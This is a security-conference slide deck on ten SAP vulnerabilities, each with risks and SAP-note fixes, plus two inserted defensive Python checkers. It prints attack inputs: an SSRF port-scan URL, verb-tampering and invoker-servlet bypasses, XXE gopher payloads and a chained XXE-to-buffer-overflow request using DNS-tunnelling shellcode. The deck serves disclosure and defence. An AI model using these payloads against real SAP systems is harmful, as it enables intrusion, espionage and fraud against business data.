Invest in security to secure investments
Top 10 most interesting SAP vulnerabilities and attacks + bonus
Alexander Polyakov, CTO at ERPScan
About ERPScan
• The only 360-degree SAP Security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
What is SAP?
Shut up And Pay
Really
• The most popular business application
• More than 120000 customers
• 74% of Forbes 500
Agenda
• Intro
• SAP security history
• SAP on the Internet
• Top 10 latest interesting attacks
• DEMOs
• Conclusion
3 areas of SAP Security
• 2010: Application platform security. Prevents unauthorized access by both insiders and remote attackers. Solution: Vulnerability Assessment and Monitoring
• 2008: ABAP Code security. Prevents attacks or mistakes made by developers. Solution: Code audit
• 2002: Business logic security (SOD). Prevents attacks or mistakes made. Solution: GRC
Talks about SAP security
[Chart: number of talks on SAP security per year, 2006-2012 (y-axis 0-35)]
Most popular:
• BlackHat
• HITB
• Troopers
• RSA
• Source
• DeepSec
• etc.
SAP Security notes
[Chart: number of SAP Security notes per year, 2001-2012 (y-axis 0-900)]
By June 2012, more than 2300 notes
SAP vulnerabilities by type
[Bar chart: number of vulnerabilities per type (x-axis 0-350), ranked:]
1 – Directory Traversal
2 – XSS / Unauthorised modification of stored
3 – Missing Auth check
4 – Information Disclosure
5 – Unauthorized usage of application
6 – Hard-coded credentials
7 – Code injection vulnerability
8 – Verb tampering
9 – Remote Code Execution
10 – Denial of service
11 – BOF
12 – SQL Inj
Stats from:
• 1Q 2012
• 1Q 2010
• 4Q 2009
Top problems by OWASP-EAS
• EASAI-1 Lack of patch management
• EASAI-2 Default passwords for application access
• EASAI-3 SOD conflicts
• EASAI-4 Unnecessary enabled application features
• EASAI-5 Open remote management interfaces
• EASAI-6 Lack of password lockout/complexity checks
• EASAI-7 Insecure options
• EASAI-8 Unencrypted communications
• EASAI-9 Insecure trust relations
• EASAI-10 Guest access
Top problems by BIZEC
• BIZEC TEC-01: Vulnerable Software in Use
• BIZEC TEC-02: Standard Users with Default Passwords
• BIZEC TEC-03: Unsecured SAP Gateway
• BIZEC TEC-04: Unsecured SAP/Oracle authentication
• BIZEC TEC-05: Insecure RFC interfaces
• BIZEC TEC-06: Insufficient Security Audit Logging
• BIZEC TEC-07: Unsecured SAP Message Server
• BIZEC TEC-08: Dangerous SAP Web Applications
• BIZEC TEC-09: Unprotected Access to Administration Services
• BIZEC TEC-10: Insecure Network Environment
• BIZEC TEC-11: Unencrypted Communications
Business Risks
• Espionage
  – Stealing financial information
  – Stealing corporate secrets
  – Stealing suppliers and customers lists
  – Stealing HR data
• Sabotage
  – Denial of service
  – Modification of financial reports
  – Access to the technology network (SCADA) through trust relations
• Fraud
  – False transactions
  – Modification of master data
  – etc.
SAP in the Internet
• We have collected data about SAP systems on the web
• Have various stats by country, application, version
• Information from Google, Shodan, Nmap scans
• Published in "SAP Security in figures: a global survey 2007-2011"
• Updating results at sapscan.com
MYTH: attacks on SAP systems are available only to insiders
SAP in the Internet (web-services)
2 SAP web services can be found on the Internet (in Hungary)
SAP in the Internet (other services)
> 5000 non-web SAP services exposed in the world, > 50 in Hungary, including Dispatcher, Message server, SapHostControl, etc.
SAP in the Internet (other services)
[Chart: % of companies that expose different services, Hungary vs. World (x-axis 0-16)]
Top 10 vulnerabilities 2011-2012
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
10 – GUI-Scripting DOS: Description
• SAP users can run scripts which automate their user functions
• A script has the same rights in SAP as the user who launched it
• The security message which is shown to the user can be turned off in the registry
• Almost any user can use SAP Messages (SM02 transaction)
• It is possible to run a DOS attack on any user using a simple script
New
Author: Dmitry Chastukhin (ERPScan)
10 – GUI-scripting: Other attacks
Script can be uploaded using:
– SAPGUI ActiveX vulnerability
– Teensy USB flash
– Any other method of client exploitation
Other attacks like changing banking accounts in LFBK are also possible
10 – GUI-scripting: Business risks
Sabotage – High
Ease of exploitation – Medium
Espionage – No
Fraud – No
10 – GUI-scripting: Prevention
• SAP GUI Scripting Security Guide
• Don't activate SAP GUI Scripting if you do not need it: sapgui/user_scripting = FALSE (default)
• For scripting with read-only capabilities use the parameters:
  – sapgui/user_scripting = TRUE
  – sapgui/user_scripting_set_readonly = TRUE
• Block registry modification on workstations
9 – XML Blowup DOS: Description
• The WEBRFC interface can be used to run RFC functions
• By default any user can have access
• Can execute at least RFC_PING
• SAP NetWeaver is vulnerable to malformed XML packets
• It is possible to run a DOS attack on the server using a simple script
• It is possible to run it over the Internet!
Author: Alexey Tyurin (ERPScan)
9 – XML Blowup DOS: Business risks
Ease of exploitation – Medium
Espionage – No
Fraud – No
Sabotage – Critical
9 – XML Blowup DOS: Prevention
• Disable WEBRFC
• Prevent unauthorized access to WEBRFC using S_ICF
• Install SAP notes 1543318 and 1469549 and 139410032
8 – BAPI script injection/hash stealing: Description
• The SAP BAPI transaction fails to properly sanitize input
• Possible to inject JavaScript code or a link to a fake SMB server
• SAP GUI clients use Windows, so their credentials will be transferred to the attacker's host
Author: Dmitry Chastukhin (ERPScan)
8 – BAPI script injection/hash stealing
8 – BAPI script injection: Business risks
Ease of exploitation – Low
Sabotage – High
Espionage – High
Fraud – High
8 – BAPI script injection: Prevention
• Install SAP note 1569550
7 – SAP GUI bad encryption: Description
• SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts are stored in .sap files
• The password is encrypted with a byte-XOR algorithm and a "secret" key
• The key has the same value for every installation of SAP GUI
• Any password can be decrypted in less than a second
Author: Alexey Sintsov (ERPScan)
7 – SAP GUI bad encryption: Demo
7 – SAP GUI bad encryption: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
7 – SAP GUI bad encryption: Prevention
Disable password storage in GUI
6 – Remote port scan/SSRF: Description
• It is possible to scan the internal network from the Internet
• Authentication is not required
• The SAP NetWeaver J2EE engine is vulnerable
• /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&password=&dispatcher=&targetClient=&view=
Author: Alexander Polyakov (ERPScan)
6 – Remote port scan/SSRF: Demo
[Demo screenshots: responses for a closed port, an HTTP port and a SAP port]
6 – Remote port scan/SSRF: Business risks
Ease of exploitation – High
Espionage – Medium
Fraud – No
Sabotage – Low
6 – Remote port scan/SSRF: Prevention
• Disable unnecessary applications
• Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883
5 – MMC JSESSIONID stealing: Description
• Remote management of the SAP Platform
• By default, many commands go without auth
• Exploits implemented in Metasploit (by ChrisJohnRiley)
• Most of the bugs are information disclosure
• It is possible to find information about the JSESSIONID
• Only if trace is ON
Can be authenticated as an existing user remotely
1) Original bug by ChrisJohnRiley
2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan)
5 – MMC JSESSIONID stealing: Business risks
Espionage – Critical
Sabotage – Medium
Fraud – High
Ease of exploitation – Medium
5 – MMC JSESSIONID stealing: Prevention
Don't use TRACE_LEVEL = 3 on production systems, or delete traces
http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
4 – RCE in TH_GREP: Description
• RCE vulnerability in the RFC module TH_GREP
• Found by Joris van de Vis
• SAP was not properly patched (1433101)
• We have discovered that the patch can be bypassed on Windows
Original bug by Joris van de Vis (erp-sec); bypass by Alexey Tyurin (ERPScan)
4 – RCE in TH_GREP: Details
Patched code:
  elseif opsys = 'Windows NT'.
    concatenate '/c:"' string '"' filename into grep_params in character mode.
  else.  " if Linux
    replace all occurrences of '''' in local_string with '''"''"'''.
    concatenate '''' local_string '''' filename into grep_params
      in character mode.
  endif.
Only the Linux branch escapes single quotes in the input before building grep_params; the Windows branch wraps the unescaped string in double quotes, which is why the patch could be bypassed on Windows.
4 – RCE in TH_GREP: Demo #1
4 – RCE in TH_GREP: More details
4 ways to execute the vulnerable program:
• Using transaction SE37
• Using transaction SM51 (thanks to Felix Granados)
• Using a remote RFC call to TH_GREP
• Using a SOAP RFC call to TH_GREP via web
4 – RCE in TH_GREP: Demo #2
4 – RCE in TH_GREP: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
4 – RCE in TH_GREP: Prevention
• Install SAP notes 1580017, 1433101
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for similar vulnerabilities
3 – ABAP Kernel BOF: Description
• Presented by Andreas Wiegenstein at BlackHat EU 2011
• Buffer overflow in the SAP kernel function C_SAPGPARAM
• When the NAME field is more than 108 chars
• Can be exploited by calling an FM which uses C_SAPGPARAM
• Example of report: RSPO_R_SAPGPARAM
Author: (VirtualForge)
3 – ABAP Kernel BOF: Business risks
Ease of exploitation – Medium
Espionage – Critical
Fraud – Critical
Sabotage – Critical
3 – ABAP Kernel BOF: Prevention
• Install SAP notes:
  – 1493516 – Correcting buffer overflow in ABAP system call
  – 1487330 – Potential remote code execution in SAP Kernel
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for critical calls
2 – Invoker Servlet: Description
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from the application
• Even if it is not declared in WEB.XML
Can be used for auth bypass
2 – Invoker Servlet: Details
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
Author: Dmitry Chastukhin (ERPScan)
What if we call /servlet/com.sap.admin.Critical.Action?
2 – Invoker servlet: Business risks
Ease of use – Very easy!
Espionage – High
Sabotage – High
Fraud – High
2 – Invoker servlet: Prevention
• Update to the latest patch: 1467771, 1445998
• "EnableInvokerServletGlobally" must be "false"
• Check all WEB.XML files with the ERPScan WEB.XML checker
1 – VERB Tampering
1st Place – Verb Tampering
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
What if we use HEAD instead of GET?
Author: Alexander Polyakov (ERPScan)
1st Place – Verb tampering: Details
Remotely without authentication!
• CTC – interface for managing the J2EE engine
• Can be accessed remotely
• Can run user management actions:
  – Add users
  – Add to groups
  – Run OS commands
  – Start/Stop J2EE
1 – Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
1 – Verb tampering: Business risks
Espionage – Critical
Sabotage – Critical
Fraud – Critical
Ease of use – Very easy!
1st Place – Verb tampering: Prevention
• Install SAP notes 1503579, 1616259
• Install other SAP notes about Verb Tampering
• Scan applications with the ERPScan WEB.XML checker
• Disable the applications that are not necessary
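The two web.xml weaknesses above (a security-constraint that lists HTTP methods, and a servlet reachable by class name through the invoker servlet) can both be found by inspecting the deployment descriptor. As an added example that is not ERPScan's WEB.XML checker, this script parses the descriptor shown on the slides (re-typed, namespaces dropped) and reports both conditions; whether the invoker servlet is enabled is passed in as a flag, since that setting lives in the engine configuration rather than in web.xml.

```python
import xml.etree.ElementTree as ET

# Descriptor from the slides, re-typed as a constructed sample (no namespace).
WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>"""


def _covered(url, pattern):
    """Servlet-spec style match: exact, or prefix for patterns ending in /*."""
    if pattern.endswith("/*"):
        return url.startswith(pattern[:-1])
    return url == pattern


def audit_web_xml(xml_text, invoker_enabled=True):
    """Return a list of findings; invoker_enabled mirrors EnableInvokerServletGlobally."""
    root = ET.fromstring(xml_text)
    findings, protected = [], []
    for sc in root.iter("security-constraint"):
        if sc.find("auth-constraint") is None:
            continue  # no role requirement, so nothing to bypass
        for col in sc.iter("web-resource-collection"):
            patterns = [p.text.strip() for p in col.findall("url-pattern")]
            protected += patterns
            methods = [m.text.strip() for m in col.findall("http-method")]
            # Listing methods limits the constraint to them: any other verb
            # (HEAD, POST, DELETE, ...) reaches the resource without a login.
            if methods:
                findings.append(f"verb tampering: {', '.join(patterns)} requires auth only for {'/'.join(methods)}")
    if invoker_enabled:
        mapping = {m.findtext("servlet-name"): m.findtext("url-pattern") for m in root.iter("servlet-mapping")}
        for s in root.iter("servlet"):
            cls, url = s.findtext("servlet-class"), mapping.get(s.findtext("servlet-name"))
            alias = "/servlet/" + (cls or "")
            # The invoker exposes /servlet/<class>; a constraint on the mapped
            # URL only is bypassed unless the alias path is constrained too.
            if (cls and url and any(_covered(url, p) for p in protected)
                    and not any(_covered(alias, p) for p in protected)):
                findings.append(f"invoker servlet: {cls} protected at {url} but reachable at {alias}")
    return findings
```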
Bonus Track!
• DilbertMSG web service
• No, I'm not kidding
• Uses SOAP XML
• For testing purposes
• Shipped with SAP PI < 7.1 by default
• Accessed without authorization
• Patched just a month ago in SAP Security note 1707494
Epic!
Bonus track! XXE Tunneling
  <?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
  ]>
  <foo>&date;</foo>
What will happen??
XXE Tunneling details
[Diagram: Server A (Portal or XI, 192.168.0.1) receives the request below; resolving the external entity makes it open a connection to port 3300 on Server B (ERP, HR, BW etc., 172.16.0.1) and send AAAAAAAAA, as "telnet 172.16.0.1 3300" would]
  POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
  Host: 192.168.0.1:8000

  <?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
  ]>
  <foo>&date;</foo>
XXE Tunneling to Buffer Overflow (step 1)
• A buffer overflow vulnerability found by Virtual Forge in the ABAP Kernel (fixed in SAP note 1487330)
• Hard to exploit because it requires calling an RFC function which calls the Kernel function
• We exploit it via WEBRFC
• Can be fixed by SAP notes: 1394100, 1536640, 1528822, 1453457
• According to our report, WEBRFC is installed in 40% of NetWeaver ABAP systems, even on the Internet
XXE Tunneling to Buffer Overflow (step 2)
• Shellcode size is limited to 255 bytes (NAME parameter)
• As we don't have a direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory (XML Spraying)
• So we can use an egghunter
• Any shellcode can be uploaded
XXE Tunneling to Buffer Overflow (Step 3)
Packet B (binary egg and shellcode bytes omitted):
  POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
  Authorization: Basic U1FQKjowMjA3NTk3==
  Host: company.com:80
  User-Agent: ERPSCAN Pentesting tool v 0.2
  Content-Type: text/xml; charset=utf-8
  Cookie: sap-client=000
  Content-Length: 2271

  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <SOAP-ENV:Body>
      <m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-com:document:sap:rfc:functions">
        <HEAP_EGG>[binary egg data]</HEAP_EGG>
        <NAME>[binary shellcode and padding]</NAME>
      </m:RSPO_R_SAPGPARAM>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>
XXE Tunneling to Buffer Overflow (Step 4)
• The next step is to pack packet B into packet A
• We need to insert non-printable symbols
• God bless gopher; it supports urlencoding like HTTP
• It will also help the attack evade IDS systems
Packet A:
  POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
  Host: sapserver.com:80
  Content-Length: 7730

  <?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY date SYSTEM "gopher://[Urlencoded Packet B]" >
  ]>
  <foo>&date;</foo>
XXE Tunneling to Buffer Overflow: Final step
[Diagram: Server A on the Internet (SAP XI, http://company.com) receives Packet A; the external entity delivers Packet B to the WebRFC service on port 8000 of Server B in the DMZ (SAP ERP, 172.16.0.1), where the shellcode with the DNS payload runs; Packet C is the command-and-control response to the attacker over the DNS protocol, which is allowed for outbound connections]
  POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
  Host: sapserver.com:80

  <?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY date SYSTEM "gopher://[packetB]" >
  ]>
  <foo>&date;</foo>
Full control over the internal system through the Internet
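Both the XML Blowup DoS against WEBRFC (item 9) and the XXE tunneling through DilbertMSG above begin with a DTD in the request body, which a SOAP message is never allowed to carry. As an added example, not from the slides and not SAP code, this gate inspects an inbound SOAP body before it reaches the XML parser, refuses any DOCTYPE, and reports which attack class it resembles; the gopher payload is re-typed from the slides, while the entity-expansion chain and the 1000-character limit are constructed.

```python
import re

# Entity declarations in an internal DTD subset. Parameter entities (%) are
# not matched: the gate rejects every DOCTYPE anyway, so they cannot slip
# through, they only get the generic reason.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<name>[\w.-]+)\s+(?:(?P<ext>SYSTEM|PUBLIC)\s+)?(["\'])(?P<val>.*?)\3',
    re.I | re.S)


def _expanded_size(name, ents, seen=()):
    """Characters produced by fully expanding an internal entity."""
    if name in seen:                      # recursive entity: unbounded
        return float("inf")
    val = ents[name]
    size = len(val)
    for ref in re.findall(r"&([\w.-]+);", val):
        if ref in ents:                   # replace "&ref;" by its expansion
            size += _expanded_size(ref, ents, seen + (name,)) - len(ref) - 2
    return size


def gate_xml(body, max_expansion=1_000):
    """Decide whether an inbound SOAP body may be handed to the XML parser.
    Returns (accepted, reason). SOAP forbids a DTD, so any DOCTYPE is refused;
    the reason names the attack class (external fetch or entity blowup)."""
    if not re.search(r"<!DOCTYPE\b", body, re.I):
        return True, "no DTD"
    internal = {}
    for e in ENTITY_RE.finditer(body):
        if e.group("ext"):
            scheme = e.group("val").split(":", 1)[0]
            return False, f"external entity {e.group('name')} fetched via {scheme}"
        internal[e.group("name")] = e.group("val")
    worst = max((_expanded_size(n, internal) for n in internal), default=0)
    if worst > max_expansion:
        return False, f"entity expansion of {worst} chars (XML blowup)"
    return False, "DTD present (forbidden in SOAP messages)"


# Payload from the slides, re-typed (XXE through the gopher URL handler).
XXE_BODY = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>"""

# Constructed internal-entity chain: 10 -> 100 -> 1000 -> 10000 chars.
BLOWUP_BODY = """<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY a "AAAAAAAAAA">
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">]>
<foo>&d;</foo>"""
```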
Conclusion
It is possible to be protected from almost all those kinds of issues, and we are working hard with SAP to make it secure
It's all in your hands
• SAP Guides
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties
Future work
Many of the researched things cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations:
• 16 October – IT Security Expo (Germany, Nurnberg)
• 30 October – HackerHalted (USA, Miami)
• 2-3 November – HashDays (Switzerland, Lucerne)
• 8-9 November – POC In Korea (Korea, Seoul)
• 20 November – ZeroNights (Russia, Moscow)
• 29 November – DeepSEC (Austria, Vienna)
Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.